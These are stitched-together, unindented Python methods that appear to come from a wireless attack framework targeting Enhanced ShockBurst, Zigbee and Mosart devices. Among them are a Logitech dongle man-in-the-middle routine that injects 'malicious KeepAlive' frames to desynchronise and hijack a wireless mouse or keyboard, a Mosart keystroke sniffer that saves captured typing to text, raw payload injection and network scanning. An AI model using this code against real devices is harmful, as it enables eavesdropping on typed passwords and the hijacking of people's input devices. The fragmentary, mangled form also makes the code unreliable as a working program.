def send(self,payloads="0f0f0f0f"):
if self.target is None:
io.fail("You must select a target before performing this action.")
else:
self.ackLock.acquire()
for payload in payloads.split(","):
try:
esbPayload = bytes.fromhex(payload)
self.emitter.sendp(esb.ESBPacket(address=self.target,payload=esbPayload))
found = False
start = utils.now()
while utils.now() - start < 1:
if self.ack:
found = True
break
self.ack = False
if found:
io.success("ACK received.")
else:
io.fail("No ACK received.")
except ValueError:
io.fail("You must specify an hexadecimal payload.")
self.ackLock.release()
return
self.ackLock.release()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkCapabilities():
if utils.isNumber(self.args["CHANNEL"]):
self.receiver.setChannel(utils.integerArg(
self.args["CHANNEL"]))
else:
io.fail("You must provide a channel number !")
return self.nok()
if self.args["TARGET_PANID"] != "":
self.targetPanID = utils.integerArg(self.args["TARGET_PANID"])
else:
self.targetPanID = None
if self.args["TARGET"] != "" and self.args["TARGET"][2:].upper(
) != "FFFF" and self.args["TARGET"].upper(
) != "FF:FF:FF:FF:FF:FF:FF:FF":
if utils.isNumber(self.args["TARGET"]):
self.target = utils.integerArg(self.args["TARGET"])
else:
self.target = zigbee.convertAddress(self.args["TARGET"])
else:
self.target = None
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
else:
self.pcap = None
self.receiver.onEvent("*", callback=self.show)
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.1)
self.receiver.removeCallbacks()
output = {
"CHANNEL": self.args["CHANNEL"],
"INTERFACE": self.args["INTERFACE"],
"PCAP_FILE": self.args["PCAP_FILE"]
}
return self.ok(output)
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff and inject frames.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkSniffingCapabilities():
self.target = "FF:FF:FF:FF" if self.args[
"TARGET"] == "" else self.args["TARGET"].upper()
if self.target == "FF:FF:FF:FF":
self.receiver.enterPromiscuousMode()
else:
self.receiver.enterSnifferMode(self.target)
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
if self.args["CHANNEL"] == "" or self.args["CHANNEL"].lower(
) == "auto":
while not self.find():
io.info("Retrying ...")
else:
self.receiver.setChannel(utils.integerArg(
self.args["CHANNEL"]))
self.receiver.onEvent("*", callback=self.show)
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
self.receiver.removeCallbacks()
if self.pcap is not None:
self.pcap.stop()
output = {}
output["MOUSE_FILE"] = self.args["MOUSE_FILE"]
output["PCAP_FILE"] = self.args["PCAP_FILE"]
output["TARGET"] = self.target
output["CHANNEL"] = str(int(self.receiver.getChannel()))
return self.ok(output)
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in sniffing mode.")
return self.nok()
def show(self, packet):
if utils.booleanArg(self.args["ACK_PACKETS"]) or (
not utils.booleanArg(self.args["ACK_PACKETS"])
and not isinstance(packet, esb.ESBAckResponsePacket)):
io.displayPacket(packet)
self.lastReceivedFrameTimestamp = utils.now()
if self.pcap is not None:
self.pcap.sendp(packet)
def monitoring(self):
self.receiver.onEvent("*", callback=self.onPacket)
try:
if self.args["TIME"] == "":
while True:
utils.wait(seconds=0.00001)
elif utils.isNumber(self.args["TIME"]):
time = utils.integerArg(self.args["TIME"])
start = utils.now()
while utils.now() - start < time:
utils.wait(seconds=0.0000001)
else:
io.fail("You have provided a wrong TIME value.")
return self.nok()
except KeyboardInterrupt:
pass
def _pingPRX(self): utils.wait(seconds=1) self.ackLock.acquire() self.emitter.sendp(esb.ESBPingRequestPacket(address=self.target)) found = False start = utils.now() while utils.now() - start < 1: if self.ack: found = True break self.ack = False if not found: self.onPingFailure() while not self.emitter.scan(): utils.wait(seconds=0.1) self.onPRXFound() self.currentChannel = self.emitter.getChannel() self.updatePrompt(self.target) self.ackLock.release()
def recv(self):
'''
This method gets the packets from the PCAP file asynchronously.
'''
if self.mode == "read":
while not self.reading:
utils.wait(seconds=0.00001)
success,data = self.getPacket()
if success:
timestamp,packet = data
if self.initialTimestamp is None:
self.initialTimestamp = timestamp
self.beginningTimestamp = utils.now()
else:
while timestamp - self.initialTimestamp > (utils.now() - self.beginningTimestamp):
utils.wait(seconds=0.00001)
return self.buildPacket(packet,timestamp)
else:
self.publish("stop")
self.close()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("*", callback=self.updateDevices)
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
if startChannel != endChannel:
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
if utils.booleanArg(self.args["ACTIVE"]):
self.emitter.sendp(
zigbee.ZigbeeBeaconRequest(sequenceNumber=1,
destPanID=0xFFFF,
destAddr=0xFFFF))
utils.wait(seconds=0.1)
i = (i + 1) % len(channels)
if startChannel != endChannel:
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) == 0:
return self.nok()
else:
return self.generateOutput()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff and inject frames.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(self.args["INTERFACE"])
self.receiver.enterPromiscuousMode()
if self.checkPromiscuousSniffingCapabilities():
self.receiver.onEvent("*", callback=self.add)
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
utils.wait(seconds=0.1)
self.displayDevices()
i = (i + 1) % len(channels)
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) >= 1:
return self.ok(self.generateOutput())
else:
return self.nok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in promiscuous mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"]))
if self.checkSniffingCapabilities():
self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
try:
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
except KeyboardInterrupt:
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.")
return self.nok()
def deviceToDongle(self, pkt):
if pkt.payload != b"" and pkt.payload != b"\x0f\x0f\x0f\x0f" and pkt.payload != b"\xFF" * 32:
self.lastFrame = utils.now()
if self.stage == ESBMitmStage.DESYNC:
self.deviceEmitter.sendp(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1))
pkt.show()
io.info("Injecting malicious KeepAlive...")
self.injectionCount += 1
if self.injectionCount >= 20:
self.injectionCount = 0
io.info("Changing dongle channel !")
self.dongleReceiver.setChannel(self.pickChannel())
elif self.stage == ESBMitmStage.ACTIVE_MITM:
self.dongleEmitter.clear()
if isinstance(pkt, esb.ESBLogitechMousePacket):
self.logitechMousePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechSetTimeoutPacket):
self.logitechSetTimeoutPacket(pkt)
elif isinstance(pkt,
esb.ESBLogitechUnencryptedKeyReleasePacket):
self.logitechUnencryptedKeyReleasePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechUnencryptedKeyPressPacket):
self.logitechUnencryptedKeyPressPacket(pkt)
elif isinstance(pkt, esb.ESBLogitechKeepAlivePacket):
self.logitechKeepAlivePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechEncryptedKeystrokePacket):
self.logitechEncryptedKeystrokePacket(pkt)
elif isinstance(pkt, esb.ESBLogitechMultimediaKeyPressPacket):
self.logitechMultimediaKeyPressPacket(pkt)
elif isinstance(pkt,
esb.ESBLogitechMultimediaKeyReleasePacket):
self.logitechMultimediaKeyReleasePacket(pkt)
self.dongleEmitter.sendp(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1200))
def run(self):
self.pcap = None
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.onEvent("*", callback=self.show)
self.receiver.onEvent("ESBLogitechMousePacket",
callback=self.addMouseData)
self.target = "FF:FF:FF:FF:FF" if self.args[
"TARGET"] == "" else self.args["TARGET"].upper()
if self.target == "FF:FF:FF:FF:FF":
if self.checkPromiscuousSniffingCapabilities():
io.info(
"Promiscuous mode enabled ! Only a subset of frames will be sniffed."
)
self.receiver.enterPromiscuousMode()
if utils.booleanArg(self.args["ACTIVE_SCAN"]):
io.warning(
"Active scanning not compatible with promiscuous mode, ACTIVE parameter will be ignored."
)
self.activeMode = False
else:
self.activeMode = utils.booleanArg(
self.args["ACTIVE_SCAN"])
else:
io.fail(
"Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff packets in promiscuous mode, you have to provide a specific target."
)
return self.nok()
else:
if self.checkNormalSniffingCapabilities():
io.info("Sniffing mode enabled !")
self.receiver.enterSnifferMode(address=self.target)
if utils.booleanArg(self.args["ACK_PACKETS"]):
io.warning(
"ACK cannot be sniffed in sniffing mode, ACK_PACKETS parameter will be ignored."
)
self.activeMode = utils.booleanArg(self.args["ACTIVE_SCAN"])
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff packets.")
return self.nok()
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
channelsTimeout = float(
self.args["CHANNEL_TIMEOUT"]
) if self.args["CHANNEL_TIMEOUT"] != "" else None
if self.activeMode and not self.checkActiveScanningCapabilities():
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to perform an active scan.")
return self.nok()
self.generateChannels()
self.searchChannel()
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
if ((utils.now() -
self.lastReceivedFrameTimestamp >= channelsTimeout) if
(channelsTimeout is not None
and self.lastReceivedFrameTimestamp is not None) else False):
io.fail("Channel lost...")
if self.args["LOST_STREAM_ACTION"].lower() == "continue":
self.searchChannel()
else:
break
self.receiver.removeCallbacks()
if self.pcap is not None:
self.pcap.stop()
output = {}
output["MOUSE_FILE"] = self.args["MOUSE_FILE"]
output["PCAP_FILE"] = self.args["PCAP_FILE"]
output["TARGET"] = self.target
output["CHANNEL"] = str(int(self.receiver.getChannel()))
return self.ok(output)
def run(self):
self.deviceReceiver = self.getReceiver(
interface=self.args["INTERFACE1"])
self.deviceEmitter = self.getEmitter(interface=self.args["INTERFACE1"])
self.dongleReceiver = self.getReceiver(
interface=self.args["INTERFACE2"])
self.dongleEmitter = self.getEmitter(interface=self.args["INTERFACE2"])
if self.checkCapabilities():
self.deviceReceiver.enterSnifferMode(self.args["TARGET"])
self.dongleReceiver.enterSnifferMode(self.args["TARGET"])
self.deviceReceiver.onEvent("*", self.deviceToDongle)
self.dongleReceiver.onEvent("*", self.dongleToDevice)
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
io.info("Entering SCAN stage ...")
self.setStage(ESBMitmStage.SCAN)
while not self.deviceReceiver.scan(self.channels):
io.info("Looking for dongle ...")
utils.wait(seconds=0.01)
io.success("Dongle found !")
io.info("Entering DESYNC stage ...")
self.setStage(ESBMitmStage.DESYNC)
dongleChannel = self.pickChannel()
self.dongleReceiver.setChannel(dongleChannel)
self.deviceReceiver.enableAutoAck()
while self.stage != ESBMitmStage.STOP:
io.info("Transmitting ACK frames for device on channel " +
str(self.deviceReceiver.getChannel()) + " ...")
io.info(
"Transmitting KeepAlive frames for dongle on channel " +
str(self.dongleReceiver.getChannel()) + " ...")
keepAlives = []
keepAlives.append(
esb.ESBLogitechKeepAlivePacket(address=self.args["TARGET"],
timeout=1200))
keepAlives.append(wireless.WaitPacket(time=10.0 / 1000.0))
while self.stage == ESBMitmStage.DESYNC or self.stage == ESBMitmStage.ACTIVE_MITM:
self.dongleEmitter.sendp(*keepAlives)
utils.wait(seconds=0.001)
if self.dongleEmitter.getChannel(
) == self.deviceEmitter.getChannel():
self.dongleEmitter.setChannel(self.pickChannel())
self.ackCount = 0
self.injectionCount = 0
self.setStage(ESBMitmStage.DESYNC)
break
if self.lastFrame is not None and utils.now(
) - self.lastFrame > utils.integerArg(
self.args["TIMEOUT"]):
io.fail("Device lost, terminating ...")
self.setStage(ESBMitmStage.STOP)
break
if self.scenarioEnabled:
self.endScenario()
return self.ok()
else:
io.fail("Interfaces provided (" + str(self.args["INTERFACE1"]) +
", " + str(self.args["INTERFACE2"]) +
") are not able to run this module.")
return self.nok()